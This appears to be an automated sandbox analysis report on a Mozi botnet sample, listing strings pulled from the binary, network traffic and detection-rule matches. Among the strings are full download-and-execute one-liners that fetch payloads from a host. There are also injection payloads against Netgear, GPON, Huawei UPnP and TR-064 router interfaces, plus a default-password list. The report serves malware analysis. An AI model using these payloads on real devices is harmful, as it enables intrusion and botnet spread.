Source: Mozi.a | String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s' |
Source: Mozi.a | String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s' |
Source: Mozi.a | String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s' |
Source: global traffic | TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443 |
Source: global traffic | TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80 |
Source: global traffic | TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443 |
Source: unknown | Network traffic detected: HTTP traffic on port 43928 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 42836 -> 443 |
Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.43 |
Source: unknown | TCP traffic detected without corresponding DNS query: 109.202.202.202 |
Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.42 |
Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.43 |
Source: unknown | TCP traffic detected without corresponding DNS query: 109.202.202.202 |
Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.42 |
Source: Mozi.a | String found in binary or memory: http://%s:%d/Mozi.a;chmod |
Source: Mozi.a | String found in binary or memory: http://%s:%d/Mozi.a;sh$ |
Source: Mozi.a | String found in binary or memory: http://%s:%d/Mozi.m |
Source: Mozi.a | String found in binary or memory: http://%s:%d/Mozi.m; |
Source: Mozi.a | String found in binary or memory: http://%s:%d/Mozi.m;$ |
Source: Mozi.a | String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m |
Source: Mozi.a | String found in binary or memory: http://%s:%d/bin.sh |
Source: Mozi.a | String found in binary or memory: http://%s:%d/bin.sh;chmod |
Source: Mozi.a | String found in binary or memory: http://127.0.0.1 |
Source: Mozi.a | String found in binary or memory: http://127.0.0.1sendcmd |
Source: Mozi.a | String found in binary or memory: http://HTTP/1.1 |
Source: Mozi.a | String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s) |
Source: Mozi.a | String found in binary or memory: http://ipinfo.io/ip |
Source: Mozi.a | String found in binary or memory: http://purenetworks.com/HNAP1/ |
Source: Mozi.a | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: Mozi.a | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/ |
Source: Mozi.a | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope// |
Source: Mozi.a, 5244.1.00000000462a18a2.00000000e4311033.r-x.sdmp | String found in binary or memory: http://upx.sf.net |
Source: LOAD without section mappings | Program segment: 0x400000 |
Source: Mozi.a, type: SAMPLE | Matched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4 |
Source: Mozi.a, type: SAMPLE | Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score = |
Source: 5244.1.00000000462a18a2.00000000e4311033.r-x.sdmp, type: MEMORY | Matched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4 |
Source: Initial sample | Potential command found: POST /cdn-cgi/ |
Source: Initial sample | Potential command found: GET /c HTTP/1.0 |
Source: Initial sample | Potential command found: POST /cdn-cgi/ HTTP/1.1 |
Source: Initial sample | Potential command found: GET %s HTTP/1.1 |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP |
Source: Initial sample | Potential command found: rm /home/httpd/web_shell_cmd.gch |
Source: Initial sample | Potential command found: echo 3 > /usr/local/ct/ctadmincfg |
Source: Initial sample | Potential command found: mount -o remount,rw /overlay / |
Source: Initial sample | Potential command found: mv -f %s %s |
Source: Initial sample | Potential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT |
Source: Initial sample | Potential command found: GET /c |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT |
Source: Initial sample | Potential command found: killall -9 %s |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 22 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 23 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP |
Source: Initial sample | Potential command found: killall -9 telnetd utelnetd scfgmgr |
Source: Initial sample | Potential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox |
Source: Initial sample | Potential command found: GET /Mozi.6 HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.7 HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.c HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.m HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.x HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.a HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.s HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.r HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.b HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.4 HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.k HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.l HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.p HTTP/1.0 |
Source: Initial sample | Potential command found: GET /%s HTTP/1.1 |
Source: Initial sample | Potential command found: POST /%s HTTP/1.1 |
Source: Initial sample | Potential command found: POST /GponForm/diag_Form?images/ HTTP/1.1 |
Source: Initial sample | Potential command found: POST /picsdesc.xml HTTP/1.1 |
Source: Initial sample | Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
Source: Initial sample | Potential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 |
Source: Initial sample | Potential command found: POST /UD/act?1 HTTP/1.1 |
Source: Initial sample | Potential command found: POST /HNAP1/ HTTP/1.0 |
Source: Initial sample | Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: Initial sample | Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 |
Source: Initial sample | Potential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1 |
Source: Initial sample | Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m |
Source: Initial sample | Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron |
Source: Initial sample | String containing potential weak password found: admin |
Source: Initial sample | String containing potential weak password found: default |
Source: Initial sample | String containing potential weak password found: support |
Source: Initial sample | String containing potential weak password found: service |
Source: Initial sample | String containing potential weak password found: supervisor |
Source: Initial sample | String containing potential weak password found: guest |
Source: Initial sample | String containing potential weak password found: administrator |
Source: Initial sample | String containing potential weak password found: 123456 |
Source: Initial sample | String containing potential weak password found: 54321 |
Source: Initial sample | String containing potential weak password found: password |
Source: Initial sample | String containing potential weak password found: 12345 |
Source: Initial sample | String containing potential weak password found: admin1234 |
Source: Initial sample | String containing 'busybox' found: busybox |
Source: Initial sample | String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s |
Source: Initial sample | String containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1 |
Source: Initial sample | String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls |
Source: Initial sample | String containing 'busybox' found: /bin/busybox cat /bin/ls|more |
Source: Initial sample | String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1 |
Source: Initial sample | String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox |
Source: Initial sample | String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox |
Source: Initial sample | String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j) |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s' |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s' |
Source: Initial sample | String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s' |
Source: Initial sample | String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s' |
Source: Initial sample | String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s' |
Source: Initial sample | String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s' |
Source: Initial sample | String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s' |
Source: Initial sample | String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s' |
Source: Initial sample | String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s' |
Source: Initial sample | String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s' |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope> |
Source: classification engine | Classification label: mal92.spre.troj.linA@0/0@0/0 |
Source: Mozi.a, 5244.1.000000004f8eb38e.0000000028a15c7e.rw-.sdmp | Binary or memory string: /etc/qemu-binfmt/mips |
Source: Mozi.a, 5244.1.00000000b89dae2d.00000000a566f1aa.rw-.sdmp | Binary or memory string: /usr/bin/qemu-mips |
Source: Mozi.a, 5244.1.000000004f8eb38e.0000000028a15c7e.rw-.sdmp | Binary or memory string: UV!/etc/qemu-binfmt/mips |
Source: Mozi.a, 5244.1.00000000b89dae2d.00000000a566f1aa.rw-.sdmp | Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/Mozi.aSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Mozi.a |
Source: Mozi.a, 5244.1.00000000b89dae2d.00000000a566f1aa.rw-.sdmp | Binary or memory string: qemu: uncaught target signal 5 (Trace/breakpoint trap) - core dumped |